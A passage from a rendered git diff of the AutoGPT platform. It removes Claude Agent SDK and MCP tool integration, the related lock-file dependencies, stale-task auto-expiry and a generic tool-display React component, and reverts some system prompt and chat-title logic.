|
||||
},
|
||||
"required": ["file_path"],
|
||||
}
|
||||
|
||||
|
||||
# Create the MCP server configuration
|
||||
def create_copilot_mcp_server():
|
||||
"""Create an in-process MCP server configuration for CoPilot tools.
|
||||
|
||||
This can be passed to ClaudeAgentOptions.mcp_servers.
|
||||
|
||||
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
|
||||
package being available. This function returns the configuration that
|
||||
can be used with the SDK.
|
||||
"""
|
||||
try:
|
||||
from claude_agent_sdk import create_sdk_mcp_server, tool
|
||||
|
||||
# Create decorated tool functions
|
||||
sdk_tools = []
|
||||
|
||||
for tool_name, base_tool in TOOL_REGISTRY.items():
|
||||
handler = create_tool_handler(base_tool)
|
||||
decorated = tool(
|
||||
tool_name,
|
||||
base_tool.description,
|
||||
_build_input_schema(base_tool),
|
||||
)(handler)
|
||||
sdk_tools.append(decorated)
|
||||
|
||||
# Add the Read tool so the SDK can read back oversized tool results
|
||||
read_tool = tool(
|
||||
_READ_TOOL_NAME,
|
||||
_READ_TOOL_DESCRIPTION,
|
||||
_READ_TOOL_SCHEMA,
|
||||
)(_read_file_handler)
|
||||
sdk_tools.append(read_tool)
|
||||
|
||||
server = create_sdk_mcp_server(
|
||||
name=MCP_SERVER_NAME,
|
||||
version="1.0.0",
|
||||
tools=sdk_tools,
|
||||
)
|
||||
|
||||
return server
|
||||
|
||||
except ImportError:
|
||||
# Let ImportError propagate so service.py handles the fallback
|
||||
raise
|
||||
|
||||
|
||||
# SDK built-in tools allowed within the workspace directory.
|
||||
# Security hooks validate that file paths stay within sdk_cwd
|
||||
# and that Bash commands are restricted to a safe allowlist.
|
||||
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
|
||||
|
||||
# List of tool names for allowed_tools configuration
|
||||
# Include MCP tools, the MCP Read tool for oversized results,
|
||||
# and SDK built-in file tools for workspace operations.
|
||||
COPILOT_TOOL_NAMES = [
|
||||
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
|
||||
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
|
||||
*_SDK_BUILTIN_TOOLS,
|
||||
]
|
||||
@@ -245,16 +245,12 @@ async def _get_system_prompt_template(context: str) -> str:
|
||||
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
|
||||
|
||||
|
||||
async def _build_system_prompt(
|
||||
user_id: str | None, has_conversation_history: bool = False
|
||||
) -> tuple[str, Any]:
|
||||
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
|
||||
"""Build the full system prompt including business understanding if available.
|
||||
|
||||
Args:
|
||||
user_id: The user ID for fetching business understanding.
|
||||
has_conversation_history: Whether there's existing conversation history.
|
||||
If True, we don't tell the model to greet/introduce (since they're
|
||||
already in a conversation).
|
||||
user_id: The user ID for fetching business understanding
|
||||
If "default" and this is the user's first session, will use "onboarding" instead.
|
||||
|
||||
Returns:
|
||||
Tuple of (compiled prompt string, business understanding object)
|
||||
@@ -270,8 +266,6 @@ async def _build_system_prompt(
|
||||
|
||||
if understanding:
|
||||
context = format_understanding_for_prompt(understanding)
|
||||
elif has_conversation_history:
|
||||
context = "No prior understanding saved yet. Continue the existing conversation naturally."
|
||||
else:
|
||||
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
|
||||
|
||||
@@ -380,6 +374,7 @@ async def stream_chat_completion(
|
||||
|
||||
Raises:
|
||||
NotFoundError: If session_id is invalid
|
||||
ValueError: If max_context_messages is exceeded
|
||||
|
||||
"""
|
||||
completion_start = time.monotonic()
|
||||
@@ -464,9 +459,8 @@ async def stream_chat_completion(
|
||||
|
||||
# Generate title for new sessions on first user message (non-blocking)
|
||||
# Check: is_user_message, no title yet, and this is the first user message
|
||||
user_messages = [m for m in session.messages if m.role == "user"]
|
||||
first_user_msg = message or (user_messages[0].content if user_messages else None)
|
||||
if is_user_message and first_user_msg and not session.title:
|
||||
if is_user_message and message and not session.title:
|
||||
user_messages = [m for m in session.messages if m.role == "user"]
|
||||
if len(user_messages) == 1:
|
||||
# First user message - generate title in background
|
||||
import asyncio
|
||||
@@ -474,7 +468,7 @@ async def stream_chat_completion(
|
||||
# Capture only the values we need (not the session object) to avoid
|
||||
# stale data issues when the main flow modifies the session
|
||||
captured_session_id = session_id
|
||||
captured_message = first_user_msg
|
||||
captured_message = message
|
||||
captured_user_id = user_id
|
||||
|
||||
async def _update_title():
|
||||
@@ -1239,7 +1233,7 @@ async def _stream_chat_chunks(
|
||||
|
||||
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
|
||||
logger.info(
|
||||
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
|
||||
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
|
||||
f"session={session.session_id}, user={session.user_id}",
|
||||
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
|
||||
)
|
||||
|
||||
@@ -814,28 +814,6 @@ async def get_active_task_for_session(
|
||||
if task_user_id and user_id != task_user_id:
|
||||
continue
|
||||
|
||||
# Auto-expire stale tasks that exceeded stream_timeout
|
||||
created_at_str = meta.get("created_at", "")
|
||||
if created_at_str:
|
||||
try:
|
||||
created_at = datetime.fromisoformat(created_at_str)
|
||||
age_seconds = (
|
||||
datetime.now(timezone.utc) - created_at
|
||||
).total_seconds()
|
||||
if age_seconds > config.stream_timeout:
|
||||
logger.warning(
|
||||
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
|
||||
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
|
||||
)
|
||||
await mark_task_completed(task_id, "failed")
|
||||
continue
|
||||
except (ValueError, TypeError):
|
||||
pass
|
||||
|
||||
logger.info(
|
||||
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
|
||||
)
|
||||
|
||||
# Get the last message ID from Redis Stream
|
||||
stream_key = _get_task_stream_key(task_id)
|
||||
last_id = "0-0"
|
||||
|
||||
@@ -335,17 +335,11 @@ class BlockInfoSummary(BaseModel):
|
||||
name: str
|
||||
description: str
|
||||
categories: list[str]
|
||||
input_schema: dict[str, Any] = Field(
|
||||
default_factory=dict,
|
||||
description="Full JSON schema for block inputs",
|
||||
)
|
||||
output_schema: dict[str, Any] = Field(
|
||||
default_factory=dict,
|
||||
description="Full JSON schema for block outputs",
|
||||
)
|
||||
input_schema: dict[str, Any]
|
||||
output_schema: dict[str, Any]
|
||||
required_inputs: list[BlockInputFieldInfo] = Field(
|
||||
default_factory=list,
|
||||
description="List of input fields for this block",
|
||||
description="List of required input fields for this block",
|
||||
)
|
||||
|
||||
|
||||
@@ -358,7 +352,7 @@ class BlockListResponse(ToolResponseBase):
|
||||
query: str
|
||||
usage_hint: str = Field(
|
||||
default="To execute a block, call run_block with block_id set to the block's "
|
||||
"'id' field and input_data containing the fields listed in required_inputs."
|
||||
"'id' field and input_data containing the required fields from input_schema."
|
||||
)
|
||||
|
||||
|
||||
|
||||
94
autogpt_platform/backend/poetry.lock
generated
94
autogpt_platform/backend/poetry.lock
generated
@@ -897,29 +897,6 @@ files = [
|
||||
{file = "charset_normalizer-3.4.4.tar.gz", hash = "sha256:94537985111c35f28720e43603b8e7b43a6ecfb2ce1d3058bbe955b73404e21a"},
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "claude-agent-sdk"
|
||||
version = "0.1.35"
|
||||
description = "Python SDK for Claude Code"
|
||||
optional = false
|
||||
python-versions = ">=3.10"
|
||||
groups = ["main"]
|
||||
files = [
|
||||
{file = "claude_agent_sdk-0.1.35-py3-none-macosx_11_0_arm64.whl", hash = "sha256:df67f4deade77b16a9678b3a626c176498e40417f33b04beda9628287f375591"},
|
||||
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:14963944f55ded7c8ed518feebfa5b4284aa6dd8d81aeff2e5b21a962ce65097"},
|
||||
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:84344dcc535d179c1fc8a11c6f34c37c3b583447bdf09d869effb26514fd7a65"},
|
||||
{file = "claude_agent_sdk-0.1.35-py3-none-win_amd64.whl", hash = "sha256:1b3d54b47448c93f6f372acd4d1757f047c3c1e8ef5804be7a1e3e53e2c79a5f"},
|
||||
{file = "claude_agent_sdk-0.1.35.tar.gz", hash = "sha256:0f98e2b3c71ca85abfc042e7a35c648df88e87fda41c52e6779ef7b038dcbb52"},
|
||||
]
|
||||
|
||||
[package.dependencies]
|
||||
anyio = ">=4.0.0"
|
||||
mcp = ">=0.1.0"
|
||||
typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""}
|
||||
|
||||
[package.extras]
|
||||
dev = ["anyio[trio] (>=4.0.0)", "mypy (>=1.0.0)", "pytest (>=7.0.0)", "pytest-asyncio (>=0.20.0)", "pytest-cov (>=4.0.0)", "ruff (>=0.1.0)"]
|
||||
|
||||
[[package]]
|
||||
name = "cleo"
|
||||
version = "2.1.0"
|
||||
@@ -2616,18 +2593,6 @@ http2 = ["h2 (>=3,<5)"]
|
||||
socks = ["socksio (==1.*)"]
|
||||
zstd = ["zstandard (>=0.18.0)"]
|
||||
|
||||
[[package]]
|
||||
name = "httpx-sse"
|
||||
version = "0.4.3"
|
||||
description = "Consume Server-Sent Event (SSE) messages with HTTPX."
|
||||
optional = false
|
||||
python-versions = ">=3.9"
|
||||
groups = ["main"]
|
||||
files = [
|
||||
{file = "httpx_sse-0.4.3-py3-none-any.whl", hash = "sha256:0ac1c9fe3c0afad2e0ebb25a934a59f4c7823b60792691f779fad2c5568830fc"},
|
||||
{file = "httpx_sse-0.4.3.tar.gz", hash = "sha256:9b1ed0127459a66014aec3c56bebd93da3c1bc8bb6618c8082039a44889a755d"},
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "huggingface-hub"
|
||||
version = "1.4.1"
|
||||
@@ -3345,39 +3310,6 @@ files = [
|
||||
{file = "mccabe-0.7.0.tar.gz", hash = "sha256:348e0240c33b60bbdf4e523192ef919f28cb2c3d7d5c7794f74009290f236325"},
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "mcp"
|
||||
version = "1.26.0"
|
||||
description = "Model Context Protocol SDK"
|
||||
optional = false
|
||||
python-versions = ">=3.10"
|
||||
groups = ["main"]
|
||||
files = [
|
||||
{file = "mcp-1.26.0-py3-none-any.whl", hash = "sha256:904a21c33c25aa98ddbeb47273033c435e595bbacfdb177f4bd87f6dceebe1ca"},
|
||||
{file = "mcp-1.26.0.tar.gz", hash = "sha256:db6e2ef491eecc1a0d93711a76f28dec2e05999f93afd48795da1c1137142c66"},
|
||||
]
|
||||
|
||||
[package.dependencies]
|
||||
anyio = ">=4.5"
|
||||
httpx = ">=0.27.1"
|
||||
httpx-sse = ">=0.4"
|
||||
jsonschema = ">=4.20.0"
|
||||
pydantic = ">=2.11.0,<3.0.0"
|
||||
pydantic-settings = ">=2.5.2"
|
||||
pyjwt = {version = ">=2.10.1", extras = ["crypto"]}
|
||||
python-multipart = ">=0.0.9"
|
||||
pywin32 = {version = ">=310", markers = "sys_platform == \"win32\""}
|
||||
sse-starlette = ">=1.6.1"
|
||||
starlette = ">=0.27"
|
||||
typing-extensions = ">=4.9.0"
|
||||
typing-inspection = ">=0.4.1"
|
||||
uvicorn = {version = ">=0.31.1", markers = "sys_platform != \"emscripten\""}
|
||||
|
||||
[package.extras]
|
||||
cli = ["python-dotenv (>=1.0.0)", "typer (>=0.16.0)"]
|
||||
rich = ["rich (>=13.9.4)"]
|
||||
ws = ["websockets (>=15.0.1)"]
|
||||
|
||||
[[package]]
|
||||
name = "mdurl"
|
||||
version = "0.1.2"
|
||||
@@ -6062,7 +5994,7 @@ description = "Python for Window Extensions"
|
||||
optional = false
|
||||
python-versions = "*"
|
||||
groups = ["main"]
|
||||
markers = "sys_platform == \"win32\" or platform_system == \"Windows\""
|
||||
markers = "platform_system == \"Windows\""
|
||||
files = [
|
||||
{file = "pywin32-311-cp310-cp310-win32.whl", hash = "sha256:d03ff496d2a0cd4a5893504789d4a15399133fe82517455e78bad62efbb7f0a3"},
|
||||
{file = "pywin32-311-cp310-cp310-win_amd64.whl", hash = "sha256:797c2772017851984b97180b0bebe4b620bb86328e8a884bb626156295a63b3b"},
|
||||
@@ -7042,28 +6974,6 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
|
||||
pymysql = ["pymysql"]
|
||||
sqlcipher = ["sqlcipher3_binary"]
|
||||
|
||||
[[package]]
|
||||
name = "sse-starlette"
|
||||
version = "3.2.0"
|
||||
description = "SSE plugin for Starlette"
|
||||
optional = false
|
||||
python-versions = ">=3.9"
|
||||
groups = ["main"]
|
||||
files = [
|
||||
{file = "sse_starlette-3.2.0-py3-none-any.whl", hash = "sha256:5876954bd51920fc2cd51baee47a080eb88a37b5b784e615abb0b283f801cdbf"},
|
||||
{file = "sse_starlette-3.2.0.tar.gz", hash = "sha256:8127594edfb51abe44eac9c49e59b0b01f1039d0c7461c6fd91d4e03b70da422"},
|
||||
]
|
||||
|
||||
[package.dependencies]
|
||||
anyio = ">=4.7.0"
|
||||
starlette = ">=0.49.1"
|
||||
|
||||
[package.extras]
|
||||
daphne = ["daphne (>=4.2.0)"]
|
||||
examples = ["aiosqlite (>=0.21.0)", "fastapi (>=0.115.12)", "sqlalchemy[asyncio] (>=2.0.41)", "uvicorn (>=0.34.0)"]
|
||||
granian = ["granian (>=2.3.1)"]
|
||||
uvicorn = ["uvicorn (>=0.34.0)"]
|
||||
|
||||
[[package]]
|
||||
name = "stagehand"
|
||||
version = "0.5.9"
|
||||
@@ -8530,4 +8440,4 @@ cffi = ["cffi (>=1.17,<2.0) ; platform_python_implementation != \"PyPy\" and pyt
|
||||
[metadata]
|
||||
lock-version = "2.1"
|
||||
python-versions = ">=3.10,<3.14"
|
||||
content-hash = "942dea6daf671c3be65a22f3445feda26c1af9409d7173765e9a0742f0aa05dc"
|
||||
content-hash = "c06e96ad49388ba7a46786e9ea55ea2c1a57408e15613237b4bee40a592a12af"
|
||||
|
||||
@@ -16,7 +16,6 @@ anthropic = "^0.79.0"
|
||||
apscheduler = "^3.11.1"
|
||||
autogpt-libs = { path = "../autogpt_libs", develop = true }
|
||||
bleach = { extras = ["css"], version = "^6.2.0" }
|
||||
claude-agent-sdk = "^0.1.0"
|
||||
click = "^8.2.0"
|
||||
cryptography = "^46.0"
|
||||
discord-py = "^2.5.2"
|
||||
|
||||
@@ -20,7 +20,6 @@ import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
|
||||
import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
|
||||
import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
|
||||
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
|
||||
import { GenericTool } from "../../tools/GenericTool/GenericTool";
|
||||
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
|
||||
|
||||
// ---------------------------------------------------------------------------
|
||||
@@ -256,16 +255,6 @@ export const ChatMessagesContainer = ({
|
||||
/>
|
||||
);
|
||||
default:
|
||||
// Render a generic tool indicator for SDK built-in
|
||||
// tools (Read, Glob, Grep, etc.) or any unrecognized tool
|
||||
if (part.type.startsWith("tool-")) {
|
||||
return (
|
||||
<GenericTool
|
||||
key={`${message.id}-${i}`}
|
||||
part={part as ToolUIPart}
|
||||
/>
|
||||
);
|
||||
}
|
||||
return null;
|
||||
}
|
||||
})}
|
||||
|
||||
@@ -1,63 +0,0 @@
|
||||
"use client";
|
||||
|
||||
import { ToolUIPart } from "ai";
|
||||
import { GearIcon } from "@phosphor-icons/react";
|
||||
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
|
||||
|
||||
interface Props {
|
||||
part: ToolUIPart;
|
||||
}
|
||||
|
||||
function extractToolName(part: ToolUIPart): string {
|
||||
// ToolUIPart.type is "tool-{name}", extract the name portion.
|
||||
return part.type.replace(/^tool-/, "");
|
||||
}
|
||||
|
||||
function formatToolName(name: string): string {
|
||||
// "search_docs" → "Search docs", "Read" → "Read"
|
||||
return name.replace(/_/g, " ").replace(/^\w/, (c) => c.toUpperCase());
|
||||
}
|
||||
|
||||
function getAnimationText(part: ToolUIPart): string {
|
||||
const label = formatToolName(extractToolName(part));
|
||||
|
||||
switch (part.state) {
|
||||
case "input-streaming":
|
||||
case "input-available":
|
||||
return `Running ${label}…`;
|
||||
case "output-available":
|
||||
return `${label} completed`;
|
||||
case "output-error":
|
||||
return `${label} failed`;
|
||||
default:
|
||||
return `Running ${label}…`;
|
||||
}
|
||||
}
|
||||
|
||||
export function GenericTool({ part }: Props) {
|
||||
const isStreaming =
|
||||
part.state === "input-streaming" || part.state === "input-available";
|
||||
const isError = part.state === "output-error";
|
||||
|
||||
return (
|
||||
<div className="py-2">
|
||||
<div className="flex items-center gap-2 text-sm text-muted-foreground">
|
||||
<GearIcon
|
||||
size={14}
|
||||
weight="regular"
|
||||
className={
|
||||
isError
|
||||
? "text-red-500"
|
||||
: isStreaming
|
||||
? "animate-spin text-neutral-500"
|
||||
: "text-neutral-400"
|
||||
}
|
||||
/>
|
||||
<MorphingTextAnimation
|
||||
text={getAnimationText(part)}
|
||||
className={isError ? "text-red-500" : undefined}
|
||||
/>
|
||||
</div>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
Reference in New Issue
Block a user